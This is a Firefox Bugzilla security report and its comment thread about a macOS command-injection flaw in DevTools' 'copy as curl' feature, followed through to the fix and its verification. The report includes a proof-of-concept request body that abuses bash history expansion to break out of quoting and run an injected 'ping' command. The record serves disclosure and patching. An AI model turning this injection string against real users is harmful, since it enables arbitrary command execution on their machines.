RCE via "copy as curl" on mac
Categories
(DevTools :: Netmonitor, defect)
Tracking
(firefox-esr60 wontfix, firefox64 wontfix, firefox65 wontfix, firefox66 verified)
People
(Reporter: watashiwaher, Assigned: bgrins)
References
Details
(4 keywords, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][adv-main66+])
Attachments
(2 files)
VULNERABILITY DETAILS Copypasting of curl requests from Firefox can produce RCE in MacOS. For example we have such JS code: fetch('https://google.com', {'body':'\'!ls:q:gs|ls|;ping 8.8.8.8;|', method:'POST'}) If we will copy it as curl we will get such bash command: curl 'https://google.com/' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'content-type: text/plain;charset=UTF-8' -H 'origin: null' -H 'DNT: 1' -H 'Connection: keep-alive' --data $'\'!ls:q:gs|ls|;ping 8.8.8.8;|' The interesting part is here: $'\'!ls:q:gs|ls|;ping 8.8.8.8;|' It is calling following command: ping 8.8.8.8 But how? The problem that mac uses old bash, and there is lack of some updates. And current mac version of bash has a problem with bash history expansions. Our bash command will be actually interpreted interesting if some of our previous commands contained 'ls'. So we will have such request: curl 'https://google.com/' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'content-type: text/plain;charset=UTF-8' -H 'origin: null' -H 'DNT: 1' -H 'Connection: keep-alive' --data $'\'';ping 8.8.8.8;'' Interesting part is here: $'\'';ping 8.8.8.8;'' So you see that here our string transformed into executable bash code. WHATS HAPPEN First of all when I found this, I asked to fix it bash team, but they told me that it is not a vulnerability at all, so there is no CVE, and that it is fixed in newer bash (it is true), and they won't fix it for old versions. Okay, I sent this information to Apple, and they fixed it... But I was slow and didn't check there fix. But later I checked fix. And the fix was strange... They fixed Safari inspector. So it looks like Apple actually doesn't think that it is a problem in Bash as I inderstand. So I am sending report to Firefox team. VERSION Works only in MacOS in any version of Firefox. REPRODUCTION CASE I attached archieve with video showcase and HTML file.
Comment 1•6 years ago
|
||
Thanks for this report. Does this also work in Chrome's devtools, and did you report to them (if so, can you provide the URL)? Do you know if there is a (public or private) URL for the safari/mac "fix"? Honza, are you the right person to look at this?
"Does this also work in Chrome's devtools, and did you report to them" Yes it works, but I made report yesterday for both: Firefox and Chrome. So it is not public yet. "Do you know if there is a (public or private) URL for the safari/mac "fix"?" For Safari: https://support.apple.com/en-us/HT208324 WebKit Web Inspector Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A command injection issue existed in Web Inspector. This issue was addressed through improved escaping of special characters. CVE-2017-7161: Mitin Svyat I looked at fix (sorry for too late). In Safari interesting part transformes in: $'\'\041ls:q:gs|ls|;ping 8.8.8.8;|'
Comment 3•6 years ago
|
||
(In reply to potatoe from comment #2) > "Does this also work in Chrome's devtools, and did you report to them" > Yes it works, but I made report yesterday for both: Firefox and Chrome. So > it is not public yet. OK, can you provide the link for completeness? We may be able to coordinate with Chrome, though if the fix for Safari is already public it might not matter very much anymore...
Here is a link (but it is private now). https://bugs.chromium.org/p/chromium/issues/detail?id=919356
Updated•6 years ago
|
Assignee | ||
Comment 5•6 years ago
|
||
I'm assuming this was the fix in Web Inspector: https://github.com/WebKit/webkit/commit/5736bda9ad07609ef386e2d5a7f5308c17b98586.
I can't find any reference to a commit from https://support.apple.com/en-us/HT208324, or a commit with the the CVE ID.
Assignee | ||
Comment 6•6 years ago
|
||
Scanning our netmonitor code for "copy as curl", this looks like the relevant function: https://searchfox.org/mozilla-central/rev/b29663c6c9c61b0bf29e8add490cbd6bad293a67/devtools/client/shared/curl.js#348
Assignee | ||
Comment 7•6 years ago
|
||
Assignee | ||
Comment 8•6 years ago
|
||
I've ported over the WebInspector fix in attachment 9036477 [details]
![]() |
||
Comment 9•6 years ago
|
||
https://hg.mozilla.org/integration/autoland/rev/10d517464fb1ba1ea73ddcaea039e32f4f4116f6
https://hg.mozilla.org/mozilla-central/rev/10d517464fb1
Comment 10•6 years ago
|
||
Too late for Fx65 in light of tomorrow's RC gtb. Let's let this ride the trains with 66.
Updated•6 years ago
|
Updated•6 years ago
|
Updated•5 years ago
|
Comment 11•5 years ago
|
||
I have managed to reproduce the issue mentioned in comment 0 using Firefox 65.0.1 (BuildId:20190211233335).
This issue is verified fixed using Firefox 66.0b9 (BuildId:20190218131312) on macOS 10.12.6
Assignee | ||
Comment 12•5 years ago
|
||
Daniel, do you think we should uplift this to ESR for the 60.6 release?
Comment 13•5 years ago
|
||
I don't feed strongly about it. It's a simple fix that release-drivers would probably take, but how many people are doing web development on ESR, let alone on ESR on mac?
Assignee | ||
Comment 14•5 years ago
|
||
(In reply to Daniel Veditz [:dveditz] from comment #13)
I don't feed strongly about it. It's a simple fix that release-drivers would probably take, but how many people are doing web development on ESR, let alone on ESR on mac?
That's a good point. Given that this is DevTools + OSX only, I'm leaning towards not taking the resources required to get this uplifted and tested onto 60.
Updated•5 years ago
|
Updated•5 years ago
|
Comment 15•5 years ago
|
||
Is the report to Bash in a public report somewhere? I'd like to link to it.
Updated•4 years ago
|
Updated•4 years ago
|
Updated•29 days ago
|
Description
•